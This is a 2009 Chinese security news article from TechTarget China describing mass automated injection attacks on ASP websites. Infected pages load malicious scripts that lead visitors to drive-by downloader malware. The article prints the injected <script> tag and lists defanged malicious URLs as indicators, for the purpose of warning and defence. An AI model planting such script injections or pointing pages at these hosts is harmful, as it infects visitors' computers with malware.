大规模自动挂马攻击源近期活跃

日期: 2009-01-03 来源:TechTarget中国 英文

  知道创宇安全团队(KnownSec team)于近期再次捕获大规模自动挂马的攻击源。昨天公布了3个感染数据库挂马类型的挂马攻击。

  最近发生多起类似的大规模注入网站进行感染数据库挂马的行为,很有可能是同一个攻击源所为,或者是开始在国内小范围流传自动注入挂马的攻击程序。相信近期会继续出现大量类似的攻击,并且存在于众多活跃的网站里,危害十分严重。

  此次公布的挂马攻击与上次公布的感染数据库的挂马有所区别,它是通过修改网站直接植入恶意代码来进行挂马,而并非感染数据库内容,通过数据库内容植入到页面时进行挂马。但这些攻击均存在一个共性:被感染的网站系统均采用ASP语言进行开发,并且存在注入漏洞。

  大家可以通过阅读以下过程以及分析,就可以了解到这些挂马攻击是如何威胁到你的个人电脑。

  1)假设,在最近你需要给你的手机进行网上充值。你就可能会通过搜索引擎进行查找可以帮你进行空中充值的站点:

   假设

  此时,搜索返回结果里,排在第一页的网站里,就出现了一个和你需求吻合的空中充值网站。接着,你通过点击搜索结果链接,进入该网站。

  2)充值网(hxxp://www.168czb.com)已经被自动攻击程序感染了数据库进行挂马,所以你在打开该网站时就会执行了通过数据库来植入网站页面的恶意代码:

  恶意代码

  可以看到源代码里,顶部被添加了恶意代码脚本链接:

<script language=”javascript” src=”hxxp://conn1.sarl.tk/click.js?bgcr=ffffff&urlcr=0000ff&tbsz=260&sropls=1″ mce_src=”hxxp://conn1.sarl.tk/click.js?bgcr=ffffff&urlcr=0000ff&tbsz=260&sropls=1″>

  通过该恶意链接,再指向了安徽省铜陵市的服务器hxxp://www.yiujjj.cn。

  而在hxxp://www.yiujjj.cn,分支了多个漏洞攻击页面,并且这些页面进行免杀,躲避你系统上杀毒软件的查杀,将病毒植入你的操作系统。

  而这个病毒一般为下载者病毒,开始将其他几十个各种病毒植入你的个人电脑,噩梦就是这样开始的。

  我们经过分析,发现了近期即将开始扩大危害的挂马攻击源,通过自动感染网页代码进行挂马攻击的恶意地址有下列两个,相信在近期会逐渐扩散其危害:

hxxp://conn1.sarl.tk/click.js?bgcr=ffffff&urlcr=0000ff&tbsz=260&sropls=1

hxxp://office2.viens.la/office.js?do=list&uid=193&type=blog

  均指向安徽的恶意软件分发服务器。

  针对近期的大规模挂马攻击,我们建议用户采取以下措施以免遭受病毒威胁:

  将系统补丁升级至最新

  安装杀毒软件并且保持监控系统的安全。

我们一直都在努力坚持原创.......请不要一声不吭,就悄悄拿走。

我原创,你原创,我们的内容世界才会更加精彩!

【所有原创内容版权均属TechTarget,欢迎大家转发分享。但未经授权,严禁任何媒体(平面媒体、网络媒体、自媒体等)以及微信公众号复制、转载、摘编或以其他方式进行使用。】

微信公众号

TechTarget微信公众号二维码

TechTarget

官方微博

TechTarget中国官方微博二维码

TechTarget中国

电子邮件地址不会被公开。 必填项已用*标注

敬请读者发表评论,本站保留删除与本文无关和不雅评论的权力。

相关推荐